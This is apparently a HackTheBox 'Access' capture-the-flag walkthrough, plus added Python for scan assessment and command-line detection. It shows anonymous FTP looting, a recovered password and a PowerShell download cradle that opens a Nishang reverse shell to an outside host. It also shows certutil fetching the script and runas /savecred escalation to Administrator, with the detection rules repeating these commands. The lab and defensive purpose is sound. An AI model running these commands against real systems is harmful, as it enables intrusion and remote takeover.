Access HTB Walkthrough

Initial Enumeration

A quick scan of the target revealed the following open ports and services:

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
23/tcp open  telnet  Microsoft Windows XP telnetd
| telnet-ntlm-info:
|   Target_Name: ACCESS
|   NetBIOS_Domain_Name: ACCESS
|   NetBIOS_Computer_Name: ACCESS
|   DNS_Domain_Name: ACCESS
|   DNS_Computer_Name: ACCESS
|_  Product_Version: 6.1.7600
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
| http-methods:
|_  Potentially risky methods: TRACE
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
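Before moving on, it is worth noting what a defender would flag in this scan without any further probing. The following Python is an added example, not part of the original walkthrough: it parses the nmap output above (embedded verbatim as the sample input), groups each port with the NSE script lines under it, and emits a finding for each weak configuration the scan already reveals. The finding format and the severity labels are my own assumptions.

```python
import re
from dataclasses import dataclass, field

# The nmap output from the walkthrough, embedded here as the sample input.
NMAP_OUTPUT = """\
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
23/tcp open  telnet  Microsoft Windows XP telnetd
| telnet-ntlm-info:
|   Target_Name: ACCESS
|   NetBIOS_Domain_Name: ACCESS
|   NetBIOS_Computer_Name: ACCESS
|   DNS_Domain_Name: ACCESS
|   DNS_Computer_Name: ACCESS
|_  Product_Version: 6.1.7600
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
| http-methods:
|_  Potentially risky methods: TRACE
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
"""

# Matches the "PORT STATE SERVICE VERSION" rows of nmap -sV output.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str
    scripts: list = field(default_factory=list)  # NSE script lines, '|' prefix stripped


@dataclass
class Finding:
    port: int          # 0 = host-level finding
    service: str
    severity: str      # assumed scale: high / medium / low
    issue: str


def parse_ports(text: str) -> list:
    """Group each port row with the NSE script lines that follow it."""
    ports = []
    current = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            number, proto, state, service, version = m.groups()
            current = Port(int(number), proto, state, service, version.strip())
            ports.append(current)
        elif line.startswith("|") and current is not None:
            current.scripts.append(line.lstrip("|_ ").strip())
    return ports


def assess(text: str) -> list:
    """Turn the parsed scan into the findings a defender would act on."""
    findings = []
    for p in parse_ports(text):
        if p.state != "open":
            continue
        script_text = "\n".join(p.scripts)
        if p.service == "ftp" and "Anonymous FTP login allowed" in script_text:
            findings.append(Finding(p.number, "ftp", "high",
                "anonymous FTP login enabled: every file in the share is readable without credentials"))
        if p.service == "telnet":
            findings.append(Finding(p.number, "telnet", "high",
                "telnet exposes logins and sessions in cleartext; replace with an encrypted remote-admin service"))
        if p.service == "http" and "Potentially risky methods: TRACE" in script_text:
            findings.append(Finding(p.number, "http", "low",
                "HTTP TRACE method enabled; disable it on the web server"))
    if "Windows XP" in text:
        findings.append(Finding(0, "os", "medium",
            "scan reports a Windows XP fingerprint: an end-of-life OS with no security updates"))
    return findings


if __name__ == "__main__":
    for f in assess(NMAP_OUTPUT):
        where = f"port {f.port}" if f.port else "host"
        print(f"[{f.severity.upper():6}] {where} ({f.service}): {f.issue}")
```

Run as a script it prints one line per finding; the anonymous FTP and cleartext telnet findings are exactly the two weaknesses the rest of this walkthrough chains together.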

FTP (Port 21)

The FTP service allowed anonymous login, which I used to gain access. Once connected, I switched to binary mode with the command:

type binary

There were two files available for download:

backup.mdb
Access Control.zip

Upon attempting to extract the zip archive (Access Control.zip), I encountered an error indicating that the file might be corrupted. However, I was able to open backup.mdb using DBeaver, where I discovered credentials in the auth_user table.

Next, I revisited the zip archive and successfully extracted it using 7-Zip. The extracted .pst file was opened in Outlook, where I uncovered additional credentials for the user security:

Username: security
Password: 4Cc3ssC0ntr0ller

Telnet (Port 23)

With the newly discovered credentials, I logged into the system via Telnet:

Once logged in, I sought to establish a more stable shell. To achieve this, I used the following PowerShell command to initiate a reverse shell:

powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.6/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.6 -Port 3001

Setting Up the Reverse Shell

I hosted a web server on port 80 to serve the Nishang reverse TCP PowerShell script. Simultaneously, I prepared a listener on port 3001, where the reverse shell would connect back to my machine.

Escalating Privileges

After some investigation, I discovered that the command cmdkey /list could be used to view the stored credentials, revealing a saved credential for the Administrator account.

With this information, I proceeded to execute a reverse shell in the context of the Administrator. First, I modified the Nishang reverse shell script by adding the following line at the bottom:

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.6 -Port 4445

This ensured that the script would execute without requiring any additional parameters.

Next, I uploaded the modified script to the target system using certutil:

certutil -f -split -urlcache http://10.10.14.6/Invoke-PowerShellTcp.ps1

Finally, I used the runas command to execute the script as the Administrator:

runas /user:ACCESS\Administrator /savecred "powershell -ep bypass -File c:\users\security\downloads\Invoke-PowerShellTcp.ps1"

By listening on the specified port (4445), I successfully received the reverse shell under the Administrator context. From there, I was able to navigate to the Administrator’s desktop and retrieve the root.txt flag.
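From a detection standpoint, every step of the escalation above leaves a distinctive process command line: a PowerShell download cradle, cmdkey enumerating stored credentials, certutil fetching a file over HTTP, and runas with /savecred wrapping an execution-policy bypass. The following Python is an added example, not code from the original post: it runs a handful of command-line rules over constructed process-creation events (Sysmon/4688-style lines invented here, containing the commands from the walkthrough plus two benign ones) and reports which rules fire. The event format and rule names are my own assumptions.

```python
import re
from typing import NamedTuple, Optional

# Constructed process-creation events in a simplified Sysmon/4688 style (not real telemetry).
# The first four commands are the ones from the walkthrough; the last two are benign.
SAMPLE_EVENTS = r"""
2024-05-01T12:00:01Z host=ACCESS user=ACCESS\security cmd="powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.6/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.6 -Port 3001"
2024-05-01T12:03:17Z host=ACCESS user=ACCESS\security cmd="cmdkey /list"
2024-05-01T12:05:40Z host=ACCESS user=ACCESS\security cmd="certutil -f -split -urlcache http://10.10.14.6/Invoke-PowerShellTcp.ps1"
2024-05-01T12:06:02Z host=ACCESS user=ACCESS\security cmd="runas /user:ACCESS\Administrator /savecred "powershell -ep bypass -File c:\users\security\downloads\Invoke-PowerShellTcp.ps1""
2024-05-01T12:07:30Z host=ACCESS user=ACCESS\security cmd="certutil -hashfile C:\Windows\System32\calc.exe SHA256"
2024-05-01T12:08:11Z host=ACCESS user=ACCESS\security cmd="notepad.exe C:\Users\security\notes.txt"
"""

# One event per line; the cmd field is the last thing on the line, so a greedy match
# keeps any quotes nested inside the command line.
EVENT_RE = re.compile(r'^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd="(?P<cmd>.*)"$')

# (rule name, pattern over the command line, why it matters)
RULES = [
    ("powershell_download_cradle",
     re.compile(r"powershell.*\b(downloadstring|downloadfile)\s*\(", re.I),
     "PowerShell fetched remote content for in-memory execution"),
    ("certutil_urlcache_download",
     re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*https?://", re.I),
     "certutil used as a file downloader instead of for certificate work"),
    ("cmdkey_credential_enum",
     re.compile(r"cmdkey(\.exe)?\b.*/list\b", re.I),
     "enumeration of credentials saved in Credential Manager"),
    ("runas_savecred",
     re.compile(r"runas(\.exe)?\b.*/savecred\b", re.I),
     "runas with a saved credential: runs as another account with no password prompt"),
    ("powershell_execution_policy_bypass",
     re.compile(r"powershell.*\s-(ep|executionpolicy)\s+bypass\b", re.I),
     "PowerShell started with the execution policy bypassed"),
]


class Alert(NamedTuple):
    ts: str
    user: str
    rule: str
    cmd: str


def parse_event(line: str) -> Optional[dict]:
    """Return the event fields as a dict, or None for blank or malformed lines."""
    m = EVENT_RE.match(line.strip())
    return m.groupdict() if m else None


def detect(text: str) -> list:
    """Apply every rule to every event; one Alert per (event, rule) match."""
    alerts = []
    for line in text.splitlines():
        ev = parse_event(line)
        if ev is None:
            continue
        for name, pattern, _why in RULES:
            if pattern.search(ev["cmd"]):
                alerts.append(Alert(ev["ts"], ev["user"], name, ev["cmd"]))
    return alerts


def rules_fired(text: str) -> list:
    return [a.rule for a in detect(text)]


def alerts_by_user(text: str) -> dict:
    """Count alerts per account: several different rules on one user in minutes is the real signal."""
    counts = {}
    for a in detect(text):
        counts[a.user] = counts.get(a.user, 0) + 1
    return counts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a.ts} {a.user} [{a.rule}] {a.cmd[:70]}")
    print(alerts_by_user(SAMPLE_EVENTS))
```

The benign certutil -hashfile line does not fire because the certutil rule requires -urlcache plus a URL, which is the shape of the download in the walkthrough; on its own each rule is noisy in an admin-heavy environment, so the per-user count is what a triage analyst would actually page on.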
